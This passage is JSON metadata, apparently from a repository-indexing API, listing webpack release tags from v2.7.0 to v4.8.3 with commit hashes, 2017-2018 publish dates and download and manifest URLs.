osts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sh